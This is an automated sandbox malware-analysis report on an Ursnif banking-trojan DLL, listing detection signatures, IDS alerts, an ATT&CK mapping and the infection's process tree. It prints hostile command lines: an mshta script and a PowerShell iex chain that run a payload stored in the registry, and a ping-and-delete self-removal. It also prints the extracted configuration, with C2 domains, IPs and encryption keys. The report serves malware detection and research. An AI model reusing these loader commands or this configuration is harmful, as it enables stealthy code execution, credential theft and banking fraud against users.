Edit tour
Windows
Analysis Report
626a983c091a8.tiff.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 3332 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\626 a983c091a8 .tiff.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 2012 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\626 a983c091a8 .tiff.dll" ,#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 4956 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\626a 983c091a8. tiff.dll", #1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 6784 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- mshta.exe (PID: 6312 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Ssif='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Ssif).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6476 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name jxrv wmqrt -val ue gp; new -alias -na me xfmkywx ojr -value iex; xfmk ywxojr ([S ystem.Text .Encoding] ::ASCII.Ge tString((j xrvwmqrt " HKCU:Softw are\AppDat aLow\Softw are\Micros oft\54E807 03-A337-A6 B8-CDC8-87 3A517CAB0E ").UrlsRet urn)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6488 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6648 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\o1ulwvc t\o1ulwvct .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6732 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES9868.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\o1u lwvct\CSC9 597862635B 74071BA42F 3284427E86 E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 6756 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\tn4ral5 l\tn4ral5l .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6792 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESA96F.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\tn4 ral5l\CSC7 E5DF85510F F49B49113D D9CBF81BD4 .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3616 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 6244 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\626a983c 091a8.tiff .dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6368 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 6096 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 4440 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
- cleanup
{"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 21 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113: |
Timestamp: | 04/28/22-15:47:50.266267 04/28/22-15:47:50.266267 |
SID: | 2033203 |
Source Port: | 49759 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/28/22-15:47:52.636763 04/28/22-15:47:52.636763 |
SID: | 2033203 |
Source Port: | 49759 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/28/22-15:47:51.337694 04/28/22-15:47:51.337694 |
SID: | 2033203 |
Source Port: | 49759 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Joe Sandbox ML: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_059365C2 | |
Source: | Code function: | 2_2_059399BC | |
Source: | Code function: | 2_2_0594BAD1 |
Source: | Code function: | 2_2_0593FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Binary or memory string: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: | Jump to behavior |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Code function: | 2_2_05953DB0 | |
Source: | Code function: | 2_2_0594154D | |
Source: | Code function: | 2_2_059367CA | |
Source: | Code function: | 2_2_0594D7F1 | |
Source: | Code function: | 2_2_0594FF4D | |
Source: | Code function: | 2_2_0593B238 |
Source: | Code function: | 2_2_05948E57 |
Source: | Code function: | 2_2_05946DE0 | |
Source: | Code function: | 2_2_059374AE | |
Source: | Code function: | 2_2_0593C431 | |
Source: | Code function: | 2_2_05940782 | |
Source: | Code function: | 2_2_0594BE80 | |
Source: | Code function: | 2_2_059461AE | |
Source: | Code function: | 2_2_0593710A | |
Source: | Code function: | 2_2_05947950 | |
Source: | Code function: | 2_2_059400DC | |
Source: | Code function: | 2_2_0594A806 | |
Source: | Code function: | 2_2_05945312 | |
Source: | Code function: | 2_2_05942331 | |
Source: | Code function: | 2_2_059364C4 | |
Source: | Code function: | 2_2_0593B7D5 | |
Source: | Code function: | 2_2_0593D77A | |
Source: | Code function: | 2_2_059336BB | |
Source: | Code function: | 2_2_059310C7 | |
Source: | Code function: | 2_2_05943829 | |
Source: | Code function: | 2_2_0594EAC5 | |
Source: | Code function: | 2_2_05945220 |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_0593EE04 |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_05953DAF | |
Source: | Code function: | 2_2_05933496 | |
Source: | Code function: | 2_2_059538A9 |
Source: | Code function: | 2_2_0593EC00 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | API coverage: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_059365C2 | |
Source: | Code function: | 2_2_059399BC | |
Source: | Code function: | 2_2_0594BAD1 |
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_0593FD47 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 2_2_0593EC00 |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_05938FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Thread created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 2_2_059516C6 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_059481F1 |
Source: | Code function: | 2_2_05942331 |
Source: | Code function: | 2_2_05931F75 |
Source: | Code function: | 2_2_059400DC |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 2 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
